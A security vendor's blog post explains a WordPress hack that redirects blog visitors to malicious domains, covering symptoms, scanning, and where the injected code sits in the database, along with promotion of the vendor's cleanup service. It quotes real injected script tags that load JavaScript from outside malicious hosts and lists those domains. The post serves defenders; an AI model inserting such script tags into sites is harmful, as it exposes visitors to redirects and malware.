911 Hack Removal

Visitors Redirecting From WordPress Blog to Malicious Domains? Resolve Now

Updated on: March 29, 2020

Visitors Redirecting From WordPress Blog to Malicious Domains? Resolve Now

Article Summary

WordPress redirect hacks have been a menace for such a long time now. It metamorphs itself into new redirect hacks every few weeks. We have been covering all those types of WordPress redirects as and when they come. Adding to the list is this blog post which uncovers yet another WordPress redirect hack type. This hack redirects blog page visitors to malicious domains.

WordPress redirect hacks have been a menace for such a long time now. It metamorphs itself into new redirect hacks every few weeks. We have been covering all those types of WordPress redirects as and when they come. Adding to the list is this blog post which uncovers yet another WordPress redirect hack type. This hack redirects blog page visitors to malicious domains.

WordPress Redirection
WordPress Redirection

Some of the malicious domains include adaranth.[com], buyittraffic.[com], cuttraffic.[com], statistic[.]admarketlocation[.]com, etc.

How to check if you are infected?

1. Observe the symptoms

  • Visitors redirecting to unsolicited domains.
  • Google rankings dropping for your blog pages.
  • You’ve been receiving warning messages from Google for illicit site behavior.
  • Your website has been blacklisted. You can easily check this with this blacklist checker tool.
  • The web page source code has malicious links.
Scan Your Website For Blacklist
Our tool scans 65+ blacklists to check if your website is blacklisted

If you notice any of the above symptoms, your website is hacked.

WordPress blog redirecting? Fix now!

2. Check with a malware scanner

Another way you can confirm the hack is by scanning your website with a malware scanner. You can use an online malware scanner for this. Just enter your website’s URL and hit Scan.

Astra's malware scanner
Astra’s malware scanner flags malicious content on a website

How to locate the hack?

Almost all redirect hacks have the same formula working behind them – malicious code injections in the database or core files. This one was no different.

After analyzing the hack, we draw the conclusion that the hacker must have injected the malicious code into the database.

It is highly likely that hackers injected a JS code in the wp_posts table (which contains every post of the website) of the database.

This is how you can check your database:

  1. Access your database with PHPMyAdmin.
  2. Go to the wp_posts table. Go to the redirecting post and search (Ctrl + F) “adaranth.[com]” (or other malicious domains) in the post.

An example of the malicious code:

<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&amp;r=1536317274530” type=“text/javascript“></script>

Another malicious script found in a hacked website looked something liked this:

<script src=’https://dl.gotosecond2.com/clizkes' type=‘text/javascript’></script>

What to do next?

Clean up the infection and secure your website.

The more you will delay the malware cleanup, the more damage it will do. Opt for Astra’s immediate malware cleanup program and get your website cleaned the same day you signed up. To get a professional malware cleanup by Astra:

  1. Sign up for Astra’s malware cleanup program
  2. Update your server credentials and that’s it.

Our security engineers will clean the infection, all the hidden backdoors from your website within 6-8 hours. Astra’s hacker tested Firewall will be then deployed on your website post-cleanup to ensure protection from such attacks in the future.

Firewall working
How Astra Web Application Firewall protects your WordPress website

Conclusion

After your website is clean and running perfectly, ensure its safety by following the recommended WordPress security best practices. Some of which are:

  • Create and use only strong passwords for all accounts on your website and server. Also, often change them.
  • Change the default admin URL to something unusual.
  • Set correct WordPress files & folder permissions
  • Restrict your admin area.
  • Limit login attempts, etc.

Have any questions about the program or Astra? Get on a chat with us.

Was this post helpful?

Jinson Varghese

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments

Psst! Hi there. We’re Astra.

We make security simple and hassle-free for thousands
of websites and businesses worldwide.

Our suite of security products include firewall, malware scanner and security audits to protect your site from the
evil forces on the internet, even when you sleep.

earth spiders cards bugs spiders

Made with ❤️ in USA France India Germany